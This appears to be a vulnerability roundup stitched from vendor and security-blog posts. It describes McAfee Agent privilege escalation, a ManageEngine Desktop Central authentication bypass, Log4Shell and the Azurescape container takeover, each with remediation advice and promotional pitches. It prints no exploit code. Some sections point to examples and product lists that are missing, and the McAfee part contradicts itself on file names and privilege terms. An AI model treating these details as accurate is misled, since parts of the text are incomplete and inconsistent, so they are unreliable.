McAfee has recently patched two high-severity security bugs in its ePO agent component, one of which can allow attackers to achieve arbitrary code execution with SYSTEM privileges.
The Agent is the piece of McAfee ePolicy Orchestrator (McAfee ePO) that downloads and enforces policies and executes client-side tasks such as deployment and updating.
A command Injection Vulnerability in McAfee Agent (MA) for Windows prior to 5.7.5 allows local users to inject arbitrary shell code into the file cleanup.exe. The malicious clean.exe file is placed into the relevant folder and executed by running the McAfee Agent deployment feature located in the System Tree. An attacker may exploit the vulnerability to obtain a reverse shell which can lead to privilege escalation to obtain root privileges.
By placing a specially-crafted openssl.cnf in a location used by McAfee Agent, an unprivileged user may be able to execute arbitrary code with SYSTEM privileges on a Windows system with the vulnerable McAfee Agent software installed.
A privilege escalation vulnerability in the McAfee Agent prior to 5.7.5. McAfee Agent uses openssl.cnf during the build process to specify the OPENSSLDIR variable as a subdirectory within the installation directory. A low privilege user could have created subdirectories and executed arbitrary code with SYSTEM privileges by creating the appropriate pathway to the specifically created malicious openssl.cnf file.
Exploiting privilege-escalation bugs lets bad actors paw at information assets that should normally be locked safely away. Hackers can use these elevated privileges to steal confidential data, run administrative commands, read files from the file system and deploy malware, as well as to potentially evade detection during attacks.
To remediate this issue, customers should update the McAfee Agent to the MA 5.7.5 release.
Zoho’s ManageEngine Desktop Central is a unified endpoint management (UEM) solution that lets IT admins manage servers, laptops, desktops, smartphones and tablets from a central location. Users can automate routines like installing patches, deploying software, imaging and deploying OS.
Zoho’s comprehensive endpoint-management platform (Desktop Central) suffers from an authentication-bypass bug (CVE-2021-44757) that could lead to remote code execution.
What is the vulnerability?
CVE-2021-44757 - Zoho ManageEngine Desktop Central before 10.1.2137.9 and Desktop Central MSP before 10.1.2137.9 allow attackers to bypass authentication, and read sensitive information or upload an arbitrary ZIP archive to the server.
What is the impact?
If exploited, this vulnerability may allow an attacker to read unauthorized data or write an arbitrary zip file on the server.
How to mitigate this?
This vulnerability has been fixed on January 17, 2022, and the mitigation is available in the latest versions of Desktop Central and Desktop Central MSP. Please refer to the KB documents of Desktop Central and Desktop Central MSP for more details.
Recommendations - Do follow the below security guidelines for Desktop Central and Desktop Central MSP to ensure all the security controls are configured to keep your network secure.
1) Update your Desktop Central server to the latest build.
2) Grant access of the Desktop Central server installed machine only to authorized users.
3) Use proper firewall and Anti-virus software and keep them up-to-date to get accurate alarm.
4) Delete unused accounts
5) Audit and review privileged user access on regular basis atleast every 3 months.
If you would like to reduce security risks around unauthorised access, quickly respond to security incidents and data breaches, contact us for a free consultation today.
A Zero Day vulnerability exploit in the popular Java logging library log4j (version 2) was discovered that results in Remote Code Execution (RCE) by logging a certain string.
Given how ubiquitous this log4j library is, the impact of the exploit is quite severe, it gives full server control, and it is so easy to exploit this vulnerability.
This zero day vulnerability exploitation is called "Log4Shell" in short.
A critical remote code execution vulnerability in the popular Apache Foundation Log4j library has been disclosed. It could allow an attacker to completely take control of an affected server. It can be leveraged in default configurations by an unauthenticated remote attacker to target applications that make use of the Log4j library. This vulnerability, tracked as CVE-2021-44228, received a CVSS severity score of a maximum 10.0, and is currently exploited in the wild by cyber attackers.
Apache Foundation Log4j is a logging library designed to replace the built-in log4j package. It is often used in popular Java projects, such as Apache Struts 2 and Apache Solr.
This vulnerability exists in the JNDI component of the LDAP connector, which allows an attacker to retrieve a payload from a remote server and execute it locally. Several proofs-of-concept and vulnerability walkthroughs have already been published. This vulnerability can be triggered to retrieve and execute a malicious class file. The vulnerability resides in the Java Naming and Directory Interface (JNDI) implementation and can be triggered using an LDAP request like the example below.
The bug find has been credited to Chen Zhaojun of Alibaba. It’s been assigned the maximum CVSS score of 10, given how relatively easy it is to exploit, attackers’ ability to seize control of targeted servers and the ubiquity of Log4j.
Because Log4j is included in a number of web applications and used by a variety of cloud services, the full scope of this vulnerability won’t be known for some time. However, at the time this blog post was published, some products and services that were confirmed to be vulnerable include:
Apache has released an updated version, Log4j 2.15.0. We encourages all customers to investigate their internal and third-party usage of Log4j for vulnerable configurations and take remediation actions. If you are uncertain or unable to determine if your implementation is vulnerable, patch aggressively.
If it's not possible to update them, the Apache Foundation recommends the following mitigations:
Organizations that don’t have an effective security tool to scan and monitor this vulnerability exploitation can sign up for a free trial of AlienVault USM.
Azure Container Instances (ACI) is Azure's Container-as-a-Service (CaaS) offering, enabling customers to run containers on Azure without managing the underlying servers. Unit 42 security researchers recently identified and disclosed critical security issues in ACI to Microsoft. A malicious Azure user could have exploited these issues to execute code on other users' containers, steal customer secrets and images deployed to the platform, and possibly abuse ACI's infrastructure for cryptomining. Researchers named the vulnerability “Azurescape” – the first cross-account container takeover in the public cloud.
Azurescape allowed malicious users to compromise the multitenant Kubernetes clusters hosting ACI, establishing full control over other users' containers. In summary, the Azurescape exploit worked like this, as demonstrated in this YouTube video:
Microsoft has patched ACI shortly after the vulnerability disclosure. There are no security alerts or knowledge of Azurescape exploited in the wild. As a precautionary measure, if you run containers on ACI, we recommend revoking any privileged credentials that were deployed to the platform before Aug. 31, 2021, and checking their access logs for any irregularities.
The rapid acceleration of the shift to the cloud that has occurred in the past few years has made these platforms a prized target for malicious actors. While we’ve long been focused on identifying new cloud threats, discovery of the first cross-account container takeover underscores the importance of that effort. Sophisticated attackers may not be satisfied with targeting end users, and may expand their campaigns to the platforms themselves to increase impact and reach.
The best way to prevent cyber attacks on any cloud environment is to implement a comprehensive cloud native security platform such as Prisma Cloud, which is able to detect and mitigate malicious behaviour as well as identify vulnerabilities in cloud environments. Contact us to learn how we can secure your infrastructure, applications and data across hybrid and multi-cloud environments.